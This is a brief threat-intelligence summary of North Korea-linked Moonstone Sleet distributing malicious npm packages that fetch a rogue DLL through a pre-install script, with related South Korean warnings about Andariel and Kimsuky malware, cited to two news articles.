A North Korea-linked threat actor [1] [2], known as Moonstone Sleet and tracked as Stressed Pungsan, has been distributing malicious npm packages targeting Windows systems [1].
Description
The packages [1], harthat-api and harthat-hash [1], were published on July 7, 2024 [1], but were quickly removed after not attracting any downloads [1]. Moonstone Sleet has been spreading these packages through the npm registry [1], with a rogue DLL file being downloaded from an external server as part of a pre-install script. This activity aligns with warnings from South Korea’s National Cyber Security Center about cyber attacks by North Korean threat groups Andariel and Kimsuky [1], targeting the construction and machinery sectors with malware such as Dora RAT and TrollAgent [1].
Conclusion
This incident highlights the ongoing threat posed by North Korean threat actors and the importance of vigilance in protecting against cyber attacks. Organizations in the construction and machinery sectors should be particularly cautious and ensure that their systems are secure against known malware such as Dora RAT and TrollAgent. Collaboration between international cybersecurity agencies is crucial in mitigating the risks posed by such malicious activities in the future.
References
[1] https://thehackernews.com/2024/08/north-korean-hackers-moonstone-sleet.html
[2] https://cybersecuritynews.com/north-korean-npm-attacks-windows/
